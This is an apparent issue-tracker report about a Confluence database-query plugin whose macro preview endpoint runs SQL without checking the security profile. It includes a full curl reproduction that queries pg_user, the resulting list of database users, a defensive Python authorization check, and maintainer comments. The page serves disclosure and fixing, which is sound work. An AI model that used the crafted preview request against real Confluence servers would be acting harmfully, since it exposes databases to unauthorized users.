Plugin security profile does not work, database exposed over CLI to any user.

Issue #102 resolved
Former user created an issue

$ curl -i -s -k -X $'POST' \
  -H $'Host: confluence-beta.nodomain.com' \
  -H $'Connection: close' \
  -H $'Content-Length: 173' \
  -H $'Accept: text/html, */*; q=0.01' \
  -H $'X-Requested-With: XMLHttpRequest' \
  -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) (KHTML, like Gecko) Chrome/81.0.4044.138' \
  -H $'Content-Type: application/json; charset=UTF-8' \
  -H $'Origin: https://confluence-beta.nodomain.com' \
  -H $'Sec-Fetch-Site: same-origin' \
  -H $'Sec-Fetch-Mode: cors' \
  -H $'Sec-Fetch-Dest: empty' \
  -H $'Referer: https://confluence-beta.nodomain.com/pages/viewpage.action?spaceKey=RT&title=This+is+just+a+test' \
  -H $'Accept-Language: en-US,en;q=0.9' \
  -H $'Cookie: JSESSIONID=1234567890; ' \
  -b $'JSESSIONID=1234567890' \
  --data-binary $'{\"contentId\":\"1814331405\",\"macro\":{\"name\":\"database-query-compact\",\"body\":\"\",\"params\":{\"profile\":\"4916321\",\"profile-name\":\"confluence\",\"sql\":\"SELECT usename FROM pg_user\"}}}' \
  $'https://confluence-beta.nodomain.com/rest/tinymce/1/macro/preview' | tail -n 40

Output:

<table class="aui"> <thead> <tr> <th>usename</th> </tr> </thead> <tbody> <tr> <td>confluenceuser</td> </tr> <tr> <td>replicator</td> </tr> <tr> <td>foox</td> </tr> <tr> <td>postgres</td> </tr> <tr> <td>confluenceread</td> </tr> </tbody>
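The report shows the macro preview endpoint executing the macro's SQL without applying the security profile that a saved page render would enforce. The following is an added example, not the plugin's own code, of the authorization decision such an endpoint has to make before touching the database: it parses the preview payload shape from the curl reproduction above, resolves the profile it names, and denies execution unless the caller belongs to a group the profile permits. The profile table, the group names, and the function names are assumptions; the macro name, profile id and profile name are taken from the report.

```python
"""Authorization check for a macro-preview request carrying SQL.

Added example; not code from the plugin. The payload shape comes from the
issue's curl reproduction, everything else (profile table, groups, names) is
an assumption used to illustrate the check the preview path must perform.
"""
import json

# Macro names that forward a SQL string to a configured database profile.
# "database-query-compact" appears in the report; "database-query" is an
# assumed sibling name.
SQL_MACROS = {"database-query", "database-query-compact"}

# Constructed security-profile table: which groups may run SQL via a profile.
# Profile id 4916321 / name "confluence" are from the report; the allowed
# group list is made up for the example.
PROFILES = {
    "4916321": {
        "name": "confluence",
        "allowed_groups": {"confluence-administrators"},
    },
}

# The exact body sent in the report's curl command.
REPORTED_PAYLOAD = (
    '{"contentId":"1814331405","macro":{"name":"database-query-compact",'
    '"body":"","params":{"profile":"4916321","profile-name":"confluence",'
    '"sql":"SELECT usename FROM pg_user"}}}'
)


def extract_sql_macro(payload):
    """Parse a /rest/tinymce/1/macro/preview body.

    Returns (macro_name, params) when the body invokes a SQL macro, or None
    when the macro is unrelated to database access (no check needed).
    """
    doc = json.loads(payload)
    macro = doc.get("macro") or {}
    name = macro.get("name")
    if name not in SQL_MACROS:
        return None
    return name, macro.get("params") or {}


def authorize_preview(payload, user_groups):
    """Decide whether the calling user may execute this preview.

    Preview must apply the same profile permission check as a page render;
    the report demonstrates the preview path skipping it. Returns
    (allowed, reason). Fail closed on anything unexpected.
    """
    found = extract_sql_macro(payload)
    if found is None:
        return True, "not a SQL macro"
    _name, params = found

    profile_id = str(params.get("profile", ""))
    profile = PROFILES.get(profile_id)
    if profile is None:
        return False, "unknown profile %r" % profile_id

    # The client-supplied profile-name must agree with the configured
    # profile; never trust it as the source of authority.
    supplied_name = params.get("profile-name")
    if supplied_name is not None and supplied_name != profile["name"]:
        return False, "profile-name does not match profile id"

    if not set(user_groups) & profile["allowed_groups"]:
        return False, "user not permitted to use profile %r" % profile["name"]
    return True, "allowed"


if __name__ == "__main__":
    # A logged-in non-admin, like the session in the report, is refused.
    print(authorize_preview(REPORTED_PAYLOAD, {"confluence-users"}))
    # A member of the profile's allowed group is let through.
    print(authorize_preview(REPORTED_PAYLOAD, {"confluence-administrators"}))
```

The decision is made on the server from the session's group membership and the stored profile configuration; nothing in the request body (including `profile-name`) is trusted for authorization, which is the property the report shows the preview endpoint lacking.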

Comments (6)

  1. Abhijit Das

    Note: I masked out the User-Agent a bit as it had some proprietary info, so you might find it incomplete. We are heavy users of this plugin and really like it. But even a read query run by non-admin users can impose harmful and extended database cost.

  2. Scott Selberg

    I’ve been working on a fix. I thought I had the answer, but as I was testing I realized that my idea didn’t cover all of the bases so I’m continuing to work on it.
